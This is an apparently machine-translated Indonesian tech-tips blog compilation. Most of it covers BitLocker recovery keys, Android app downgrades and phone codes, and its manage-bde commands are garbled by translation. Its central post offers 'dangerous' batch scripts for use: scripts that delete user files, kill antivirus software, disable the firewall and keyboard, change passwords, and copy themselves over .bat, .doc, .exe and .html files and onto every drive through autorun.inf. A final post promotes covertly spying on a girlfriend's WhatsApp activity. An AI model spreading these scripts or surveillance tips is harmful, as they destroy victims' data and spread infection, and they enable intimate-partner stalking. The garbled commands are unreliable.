Ini akan meminta Anda untuk teks ketika Anda membuka file, memasukkan teks dan tekan ok. "

kamu akan mendengar sekarang apa yang kamu ketik ..

ini bekerja di xp, vista, win7 juga.

enjoy !!!

Wednesday, November 6, 2019

Cara Menghapus Kunci Enkripsi Disk Windows Anda Dari Server Microsoft

CMD
Windows memungkinkan enkripsi perangkat pada banyak PC Windows 10 dan 8.1. Itu juga mengunggah kunci pemulihan Anda ke server Microsoft, memungkinkan Anda untuk mendapatkan kembali akses ke drive terenkripsi Anda bahkan jika Anda lupa kata sandi mereka.

Namun, jika Anda tidak nyaman dengan ini, Anda dapat menghapus kunci pemulihan dari server Microsoft atau bahkan membuat kunci baru. Proses ini bahkan bekerja pada edisi Home Windows, meskipun mereka tidak memiliki akses ke enkripsi BitLocker lengkap yang disediakan oleh versi Profesional.

Anda Mungkin Seharusnya Tidak Melakukan Ini


Secara realistis, Anda mungkin tidak boleh melakukan ini. Tidak biasa bahwa Microsoft secara diam-diam mengunggah kunci pemulihan ke servernya sendiri, tetapi sebenarnya tidak lebih buruk daripada status quo sebelumnya. Versi Windows sebelumnya - dan banyak PC Windows saat ini yang masih belum dikirimkan dengan enkripsi perangkat diaktifkan - hanya tidak dienkripsi. Itu berarti siapa pun dapat mengakses file mereka jika mereka bisa mendapatkan komputer mereka. Mengaktifkan enkripsi dan memberikan Microsoft kunci pemulihan adalah bantuan besar terhadap pencuri laptop dan orang lain yang mungkin ingin mengintip file Anda.

Kunci pemulihan memungkinkan Anda mendapatkan kembali akses ke file komputer Anda meskipun Anda lupa kata sandi, atau memutakhirkan perangkat keras pada sistem Anda (yang terkadang dapat mengunci Anda dari drive yang dienkripsi). Anda cukup masuk ke akun Microsoft Anda secara online, menemukan kunci pemulihan, dan mengetiknya di komputer Anda untuk mengakses hard drive yang terkunci. Ini adalah keuntungan besar bagi pengguna rumahan yang tidak perlu membuat cadangan kunci pemulihan mereka di tempat yang aman, dan mungkin lupa kata sandi mereka. Pengguna rumahan tidak akan senang jika mereka kehilangan semua file di komputer mereka karena sesuatu yang konyol.

Tentu saja, sisi lain dari koin di sini adalah bahwa Microsoft dapat dipaksa untuk memberikan kunci pemulihan Anda kepada pemerintah. Atau, secara bergantian, seseorang dapat memperoleh akses fisik ke komputer Anda dan entah bagaimana masuk ke akun Microsoft Anda untuk mengakses kunci pemulihan dan memotong enkripsi. Kiat di bawah ini akan mengambil kunci pemulihan itu dari Microsoft. Tetapi jika Anda melakukan ini, Anda harus menyimpan salinannya sendiri dan menyimpannya di tempat yang aman . Jika hilang, dan Anda lupa kata sandi atau perbarui perangkat keras tanpa menonaktifkan enkripsi terlebih dahulu, Anda akan dikunci untuk selamanya.

Hapus Kunci Pemulihan Dari Server Microsoft


Untuk memeriksa apakah Microsoft menyimpan kunci pemulihan untuk satu atau lebih PC Anda, buka halaman https://onedrive.live.com/recoverykey di browser web Anda. Masuk dengan akun Microsoft yang sama dengan yang Anda masuk pertama kali pada PC Windows itu.

Jika Anda tidak memiliki kunci yang disimpan di server Microsoft, Anda akan melihat pesan "Anda tidak memiliki kunci pemulihan BitLocker di akun Microsoft Anda".

Jika Anda memiliki kunci pemulihan yang disimpan di server Microsoft, Anda akan melihat satu atau lebih kunci pemulihan di sini. Klik nama komputer Anda dan kemudian klik tautan "Hapus" yang muncul untuk menghapus kunci pemulihan Anda dari server Microsoft.

Peringatan : Catat kunci pemulihan ini atau cetak dan simpan di tempat yang aman sebelum menghapusnya! Anda akan memerlukan kunci pemulihan jika Anda perlu mendapatkan kembali akses ke file terenkripsi Anda. 


Hasilkan Kunci Pemulihan Baru


Microsoft berjanji mereka akan dengan cepat menghapus kunci pemulihan yang Anda hapus dari server mereka. Namun, jika Anda agak paranoid, ini mungkin tidak akan cukup baik untuk Anda. Sebagai gantinya, Anda dapat meminta Windows membuat kunci pemulihan baru yang tidak akan pernah diunggah ke server Microsoft.

Ini tidak perlu mengenkripsi ulang seluruh drive Anda. Pada dasarnya, enkripsi BitLocker menggunakan dua kunci. Kunci pertama disimpan hanya di komputer Anda dan digunakan untuk mengenkripsi dan mendekripsi file Anda. Kunci kedua digunakan untuk mendekripsi kunci yang tersimpan di komputer Anda. Proses ini hanya mengubah kunci kedua, yang merupakan satu-satunya yang pernah meninggalkan komputer Anda.

Untuk melakukan ini, klik kanan tombol Start dan pilih "Command Prompt (Admin)" untuk membuka jendela Prompt Perintah sebagai administrator.


Ketikkan perintah berikut dan tekan Enter untuk sementara "menangguhkan" perlindungan BitLocker:

manage-bde -protectors -disable% systemdrive%


Jalankan perintah berikut untuk menghapus kunci pemulihan saat ini

manage-bde -protectors -delete% systemdrive% -type RecoveryPassword 


Kemudian jalankan perintah ini untuk menghasilkan kunci pemulihan baru:

manage-bde -protectors -add% systemdrive% -RecoveryPassword

Penting : Tulis atau cetak kunci pemulihan yang ditampilkan setelah Anda menjalankan perintah ini dan simpan di tempat yang aman! Ini adalah kunci pemulihan baru Anda, dan Anda bertanggung jawab untuk menjaganya.


Terakhir, aktifkan kembali perlindungan BitLocker:

 manage-bde -protectors -ableable% systemdrive%


Anda akan melihat pesan yang mengatakan tidak ada drive di komputer yang mendukung enkripsi perangkat. Namun, mereka dienkripsi. Jika Anda ingin membatalkan semua perubahan, Anda harus menonaktifkan enkripsi di jendela command prompt.

Atau Cukup Gunakan BitLocker Sebagai Gantinya
Jika Anda memiliki edisi Professional Windows - atau jika Anda bersedia membayar $ 99 lagi untuk meningkatkan ke edisi Professional Windows - Anda dapat melewati semua ini dan hanya mengatur enkripsi BitLocker normal. Ketika Anda mengatur BitLocker, Anda akan ditanya bagaimana Anda ingin membuat cadangan kunci pemulihan Anda. Hanya saja, jangan pilih opsi "Simpan ke akun Microsoft Anda" dan Anda akan baik-baik saja. Pastikan untuk menuliskan kunci pemulihan atau mencetaknya dan menyimpannya di tempat yang aman!

Ini juga satu-satunya cara resmi untuk mengenkripsi drive sistem Windows Anda jika komputer Anda tidak dikirimkan dengan enkripsi perangkat diaktifkan. Anda tidak bisa hanya mengaktifkan enkripsi perangkat nanti - pada PC Windows Home tanpa enkripsi perangkat, Anda harus membayar untuk Windows Professional sehingga Anda dapat menggunakan BitLocker. Anda bisa mencoba menggunakan TrueCrypt atau alat open-source yang serupa, tetapi awan ketidakpastian masih menggantung di atasnya.


Sekali lagi, sebagian besar pengguna Windows tidak akan mau melakukan ini. Dengan enkripsi perangkat, Microsoft pindah dari semua PC Windows yang tidak dienkripsi secara default ke banyak PC Windows yang dienkripsi secara default. Meskipun Microsoft memiliki kunci pemulihan, itu adalah kemenangan besar untuk keamanan data dan peningkatan besar. Tetapi, jika Anda ingin melangkah lebih jauh, trik-trik di atas akan memungkinkan Anda mengambil kendali atas kunci pemulihan Anda tanpa membayar Windows edisi Professional.

Beberapa file .bat Paling BERBAHAYA


Beberapa kode ini sangat berbahaya!
GUNAKAN INI DI RISIKO ANDA SENDIRI.


Blokir Google.

Kode:
@echo off
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 http://www.google.com >> "Hosts"
::---------------------------::

Blokir Hotmail.

Kode:
@echo off
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 http://www.hotmail.com >> "Hosts"
::---------------------------::

Blokir MSN.

Kode:
@echo off
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 http://www.msn.com >> "Hosts"
::---------------------------::

Blokir wikipedia.

Kode:
@echo off
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 http://www.wikipedia.org >> "Hosts"
::---------------------------::

Ubah waktu menjadi 00:00.

Kode:
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Ubah pass pengguna.

Kode:
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Buat akun MILIK.

Kode:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Hapus semua dokumen.

Kode:
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::

Hapus semua musik.

Kode:
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::

Hapus semua foto.

Kode:
@echo off
::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::

Nonaktifkan Firewall.

Kode:
@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::

[color = # FF0000] Nonaktifkan Internet.
Kode:
@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::

Nonaktifkan Keyboard.

Kode:
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::

Menginfeksi semua Bat.

Kode:
@echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
) @echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Menginfeksi semua dokumen.

Kode:
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
) @echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Menginfeksi semua Driver.

Kode:

@echo off

:: —– Menginfeksi Semua Drive—– ::
untuk %% E In (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) Lakukan (
copy / Y% 0 %% E: \
echo [AutoRun]> %% E: \ autorun.inf
echo open = ”%% E: \% 0 ″ >> %% E: \ autorun.inf
echo action = Buka folder untuk melihat file ... >> %% E: \ autorun.inf)
:: ———————— ::

Menginfeksi semua file .exe.

Kode:
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
) @echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Buka disk.

Kode:
@echo off
::-------Open Disk Tray------::
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
::---------------------------::

Spam / Drive C.

Kode:
@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::

Bunuh Anti-virus.

Kode:

@echo off

:: ——- AV Kill [UD] ——– ::
berhenti bersih "Pusat Keamanan"
set firewall netsh mode opmode = nonaktifkan
tskill / A av *
tskill / A fire *
tskill / A anti *
cls
tskill / Mata-mata *
tskill / A bullguard
tskill / A PersFw
tskill / A KAV *
tskill / A ZONEALARM
tskill / A SAFEWEB
cls
tskill / A OUTPOST
tskill / A nv *
tskill / A nav *
tskill / A F- *
tskill / A ESAFE
tskill / A cle
cls
tskill / A BLACKICE
tskill / A def *
tskill / A kav
tskill / A kav *
tskill / A rata-rata *
tskill / A ash *
cls
tskill / A aswupdsv
tskill / A ewid *
tskill / Seorang penjaga *
tskill / A guar *
tskill / A gcasDt *
tskill / A msmp *
cls
tskill / A mcafe *
tskill / A mghtml
tskill / A msiexec
tskill / A outpost
tskill / A aman
tskill / A zap *
cls
tskill / A zauinst
tskill / A upd *
tskill / A zlclien *
tskill / A minilog
tskill / A cc *
tskill / A norton *
cls
tskill / A norton au *
tskill / A ccc *
tskill / A npfmn *
tskill / A loge *
tskill / A nisum *
tskill / A issvc
tskill / A tmp *
cls
tskill / A tmn *
tskill / A pcc *
tskill / A cpd *
tskill / A pop *
tskill / A pav *
tskill / A padmin
cls
tskill / A panda *
tskill / A avsch *
tskill / A sche *
tskill / A syman *
tskill / A virus *
tskill / A realm *
cls
tskill / A sweep *
tskill / A scan *
tskill / A ad- *
tskill / Brankas *
tskill / A avas *
tskill / A norm *
cls
tskill / A offg *
del / Q / FC: \ Program Files \ alwils ~ 1 \ avast4 \ *. *
del / Q / FC: \ Program Files \ Lavasoft \ Ad-awa ~ 1 \ *. exe
del / Q / FC: \ Program Files \ kasper ~ 1 \ * .exe
cls
del / Q / FC: \ Program Files \ trojan ~ 1 \ * .exe
del / Q / FC: \ Program Files \ f-prot95 \ *. dll
del / Q / FC: \ Program Files \ tbav \ * .dat
cls
del / Q / FC: \ Program Files \ avpersonal \ *. vdf
del / Q / FC: \ Program Files \ Norton ~ 1 \ *. cnt
del / Q / FC: \ Program Files \ Mcafee \ *. *
cls
del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ *. *
del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ *. *
del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ *. *
del / Q / FC: \ Program Files \ Norton ~ 1 \ *. *
cls
del / Q / FC: \ Program Files \ avgamsr \ * .exe
del / Q / FC: \ Program Files \ avgamsvr \ * .exe
del / Q / FC: \ Program Files \ avgemc \ *. exe
cls
del / Q / FC: \ Program Files \ avgcc \ *. exe
del / Q / FC: \ Program Files \ avgupsvc \ *. exe
del / Q / FC: \ Program Files \ grisoft
del / Q / FC: \ Program Files \ nood32krn \ *. exe
del / Q / FC: \ Program Files \ nood32 \ * .exe
cls
del / Q / FC: \ Program Files \ nod32
del / Q / FC: \ Program Files \ nood32
del / Q / FC: \ Program Files \ kav \ * .exe
del / Q / FC: \ Program Files \ kavmm \ * .exe
del / Q / FC: \ Program Files \ kaspersky \ *. *
cls
del / Q / FC: \ Program Files \ ewidoctrl \ * .exe
del / Q / FC: \ Program Files \ guard \ * .exe
del / Q / FC: \ Program Files \ ewido \ *. exe
cls
del / Q / FC: \ Program Files \ pavprsrv \ * .exe
del / Q / FC: \ Program Files \ pavprot \ * .exe
del / Q / FC: \ Program Files \ avengine \ *. exe
cls
del / Q / FC: \ Program Files \ apvxdwin \ *. exe
del / Q / FC: \ Program Files \ webproxy \ * .exe
del / Q / FC: \ Program Files \ perangkat lunak panda \ *. *
:: ———————— ::

 Menginfeksi semua HTML.

Kode:
@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
) @echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Sembunyikan folder MUSIC.

Kode:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Lagu startup XP

Kode:
@echo off
::--Start Hidden WinXP Song--::
cd "C:\Windows\system32\oobe\images"
start title.wma
::---------------------------::

CMD terinfeksi.

Kode:
@echo off
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------::

Tuesday, November 5, 2019

Siapa pun dapat mengetahui kata sandi Anda dari metode ini.

Di halaman login situs web, Anda dapat melihat kata sandi yang di-mask (******) dengan mengubah jenis input kata sandi sebagai teks dari elemen inspeksi di browser Anda. Metode ini berfungsi di semua browser modern. Jangan pernah meninggalkan komputer Anda dengan halaman pendaftaran.

View-password-text-asterisk

Cara Menurunkan Aplikasi Android jika Anda Tidak menyukai Pembaruan

Semua Aplikasi Android mendapatkan pembaruan mereka, beberapa mungkin mendapatkan pembaruan segera dan beberapa mungkin mendapatkan pembaruan yang sangat jarang. Pembaruan ini dapat membuat perubahan unik baru atau hanya mengubah aplikasi yang ada yang telah Anda instal sebelumnya di perangkat Anda. Lihat metode untuk menurunkan versi aplikasi apa pun di Android Anda .

Kadang-kadang mungkin ada masalah yang dihadapi oleh pengguna di mana mereka menemukan aplikasi tidak berfungsi dengan benar atau menemukan beberapa kesalahan setelah upgrade dan ini bukan tidak mungkin sementara para pengembang tidak yakin tentang cara kerja yang sama dari aplikasi pada setiap perangkat. Sekarang, bagaimana jika Anda telah meningkatkan aplikasi dan kemudian setelah menggunakannya lagi Anda merasa aplikasi tersebut tidak berfungsi dengan benar dan mendapatkan beberapa kesalahan di dalamnya, hal negatif apa pun yang Anda dapatkan di aplikasi, Anda mungkin ingin menghapus aplikasi itu atau hanya menggunakannya sama. Tetapi ada sesuatu yang mungkin tidak terpikirkan oleh Anda, yaitu menurunkan versi aplikasi karena tidak ada opsi langsung untuk tindakan yang sama di Android. Namun terlepas dari itu, Anda sebenarnya dapat melakukannya dengan beberapa metode, dan di sini di artikel ini, metode tersebut dijelaskan dengan baik. Seperti beberapa waktu itu juga terjadi pada saya bahwa saya tidak suka antarmuka pengguna baru atau kadang-kadang fungsionalitas tambahan yang ditambahkan pengembang aplikasi jadi saya pergi untuk menurunkan versi aplikasi tersebut. Dan juga itulah satu-satunya alasan saya meneliti untuk itu dan menemukan cara di bawah ini yang dengannya saya dapat melakukan itu. Cukup baca artikel untuk informasi lebih lanjut tentang metode itu.

Untuk aplikasi sistem, mungkin ada satu-satunya pilihan untuk menurunkan versi aplikasi diperbarui dengan menghapus instalasi pembaruan aplikasi dari preferensi aplikasi. Untuk aplikasi pihak ketiga, Anda dapat melalui proses di bawah ini.

Langkah-langkah Untuk Menurunkan Versi Aplikasi Android jika Anda tidak menyukai Pembaruan:


1. Pertama-tama, buka pengaturan perangkat Android dan kemudian dari opsi matikan saja fitur Pembaruan Otomatis untuk aplikasi yang diinstal. Setelah itu, Anda juga harus memeriksa bahwa opsi untuk menginstal aplikasi dari sumber yang tidak dikenal juga diaktifkan karena Anda akan memerlukan fitur itu sesudahnya.




2. Sekarang periksa versi aplikasi yang lebih rendah yang ingin Anda turunkan di Android dan kemudian unduh dari web . Anda dapat dengan mudah menemukan versi aplikasi yang Anda inginkan untuk dijalankan di perangkat Anda. Setelah itu hapus instalan aplikasi yang diinstal pada Perangkat Anda.

3. Sekarang navigasikan ke folder pada manajer file Anda di mana Anda telah mengunduh versi yang diperlukan dari aplikasi yang sama yang Anda inginkan (versi yang diturunkan). Sekarang klik file apk untuk aplikasi itu dan itu akan mulai menginstal pada perangkat Anda. 




4. Setelah aplikasi berhasil diinstal dengan semua izin diterima, Anda sekarang dapat membuka aplikasi yang sama dari ikon yang dapat Anda lihat di dok Android Anda. Itu terlalu sederhana karena Anda terbiasa dengan itu!

5. Aplikasi yang akan Anda luncurkan tidak akan menjadi versi yang diperbarui tetapi akan menjadi versi yang diturunkan dari aplikasi. Ingatlah bahwa Anda tidak harus mengaktifkan fitur pembaruan aplikasi otomatis di perangkat Anda karena ini akan memperbarui lagi aplikasi yang tidak ingin Anda lakukan.

Dan ini adalah metode mudah yang dengannya Anda dapat dengan mudah menurunkan versi salah satu aplikasi yang diperbarui pada perangkat Android Anda, meskipun metode ini tidak secara langsung berlaku melalui opsi atau pengaturan Android tetap tidak jauh lebih sulit dari itu. Bangun saja seluruh gagasan tentang metode ini dan kemudian coba di perangkat Anda, Anda dapat dengan mudah menyingkirkan masalah yang dihadapi oleh peningkatan aplikasi karena Anda akan menghapus instalan pembaruan tersebut dan menurunkan versi aplikasi ke versi sebelumnya. Semoga Anda menyukai panduan ini, bagikan juga kepada orang lain.

Monday, November 4, 2019

Cari Tahu Siapa Yang Melacak Anda Melalui Android Anda


Jika kita berbicara tentang sistem operasi Android, alasan orang memilih Android daripada OS seluler lainnya adalah bahwa platform ini memiliki fitur yang berbeda untuk setiap tujuan tertentu. Kami telah berhasil mengumpulkan beberapa kode yang berguna untuk pengguna Android yang akan membantu mereka yang khawatir dilacak.

Biarkan saya memberitahu Anda, hari-hari itu hilang ketika smartphone hanya digunakan untuk komunikasi suara. Kita hidup dalam generasi di mana smartphone kita lebih dari komputer kuat yang biasa kita bawa di saku kita.

Jika kita berbicara tentang sistem operasi Android, alasan orang memilih Android daripada OS seluler lainnya adalah bahwa platform ini memiliki fitur yang berbeda untuk setiap tujuan tertentu. Saat ini di dunia maya ini, ada begitu banyak masalah keamanan seperti banyak virus, malware, trojan, dan keylogger yang dapat mempengaruhi perangkat kita.

Sebagian besar malware ditargetkan ke sistem operasi Android karena Android sekarang mendukung mayoritas smartphone. Keselamatan harus selalu menjadi prioritas utama kami dalam kasus ini. Di sini kita akan menyebutkan beberapa kode pendek yang akan membantu Anda menemukan pengaturan ponsel Anda dan untuk mengetahui apakah pesan dan informasi Anda sedang dilacak.

Kami telah berhasil mengumpulkan beberapa kode yang berguna untuk pengguna Android yang akan membantu mereka yang khawatir dilacak.

Kode 1: * # 21 #

Kode ini akan memungkinkan Anda mengetahui apakah pesan, panggilan, dan data lainnya sedang dialihkan. Anda dapat menemukan detail tentang penerusan panggilan. Anda bahkan dapat mengetahui di mana data Anda , suara, faks, SMS, sinkronisasi, async, akses paket, dan penerusan panggilan akses pad diaktifkan atau dinonaktifkan.

Kode 2: * # 62 #

Jika teman Anda memberi tahu Anda, bahwa nomor Anda mengatakan tidak ada layanan atau tidak ada jawaban, maka Anda perlu memasukkan kode ini pada ponsel cerdas Anda untuk mengetahui di mana panggilan, pesan, dan data Anda dialihkan . Ada kemungkinan panggilan Anda dialihkan ke salah satu nomor operator ponsel Anda.

Kode 3: ## 002 #

Ini adalah kode universal untuk menonaktifkan semua penerusan panggilan. Ini akan segera mematikan semua pengalihan dari telepon Anda . Jika Anda merasa bahwa panggilan Anda sedang dialihkan, maka Anda dapat memanggil kode ini untuk menghentikan pengalihan. Sebaiknya gunakan kode ini sebelum Anda harus menggunakan roaming sehingga uang tidak akan diambil dari akun Anda.

Kode 4: * # 06 #

Kode ini digunakan untuk menemukan International Mobile Equipment Identifier (IMEI) . Kode ini akan sangat berguna untuk menemukan nomor IMEI di ponsel cerdas Anda. Anda dapat mencatat nomor IMEI Anda di tempat yang aman. Dengan bantuan nomor IMEI, Anda dapat menemukan telepon Anda jika seseorang mencurinya.

Kode 5: * # * # 4636 # * # * atau * # * # 197328640 # * # *

Kode khusus ini memungkinkan siapa pun untuk melacak lokasi Anda dan juga menentukan apakah seseorang mengikuti Anda.

Ketik kode berikut pada papan tombol lalu pilih bagian yang disebut UMTS Cell Environment, lalu pilih info UMTS RR . Sekarang catat semua angka di bawah Cell ID .

Sekarang pindah ke menu utama dan kemudian klik pada tab info MM> Melayani PLMN . Sekarang catat angka-angka di bawah kode area lokal (LAC).

Setelah mencatat kedua angka ini, buka situs web terbuka dan pilih tab keempat di sebelah kiri. Dari sana Anda dapat menentukan lokasi di peta stasiun dasar yang terhubung dengan ponsel Anda.

Jadi, ini adalah 5 kode yang akan membantu Anda untuk mengetahui lebih lanjut tentang pengaturan ponsel Anda dan untuk mengetahui apakah pesan Anda dilindungi atau tidak.

Memantau dan Memantau Akun Whatsapp Takya GirlFriend dari WhatsDog

Kami semua khawatir tentang aktivitas Pacar kami. Dalam posting ini saya memberitahu Anda bagaimana Anda bisa memata-matai akun Whatsapp seperti akun Pacar Anda. Anda tidak memerlukan pengaturan besar pengaturan ini dilakukan oleh aplikasi android sederhana yang menyeramkan. Aplikasi android Takya ini bernama Whatsdog.

Memantau dan Memantau Akun Whatsapp Spy GirlFriend dari WhatsDog

Whatsdog memantau aktivitas online pengguna akun whatsapp seperti ketika mereka masuk atau keluar. Berapa banyak mereka menghabiskan waktu online. Semua data ini disimpan dalam grafik dan kalender. Itu sebabnya ini adalah aplikasi yang sangat keren. Anda dapat memeriksa berapa kali pacar Anda online dan offline.

Dengan WhatsDog, pasangan Anda tidak pernah memberikan alasan seperti "Saya sedang offline.", "Maaf saya tidak membaca pesan Anda." Whatsdog adalah alat yang sangat ampuh untuk memata-matai. Jika pasangan Anda menetapkan opsi sembunyikan untuk yang terakhir terlihat di whatsapp. Jangan khawatir alat ini berfungsi dalam segala kondisi. Tidak ada yang tahu mereka sedang dipantau oleh Whatsdog.

 Cara Menggunakan WhatsDog: -


Unduh Whatsdog dari Uptodown
Buka Whatsdog dan pilih Kontak



Mengapa saya harus menggunakan WhatsDog?

- Tidak ada lagi alasan
- Karena pacarmu tidak akan bisa berbohong lagi
- Karena Anda akan dapat memonitor jika dia keluar kemarin
- Karena Anda akan waspada: Anda akan tahu kapan WhatsApp dibuka oleh kontak Anda

WhatsDog SELALU dapat melihat WhatsApp terlihat terakhir kali, bahkan jika kontak Anda menonaktifkan opsi itu. Tidak masalah jika kontak Anda memiliki iPhone atau dia memblokir Anda, WhatsDog dapat mengawasi semuanya. Ini SELALU bekerja!
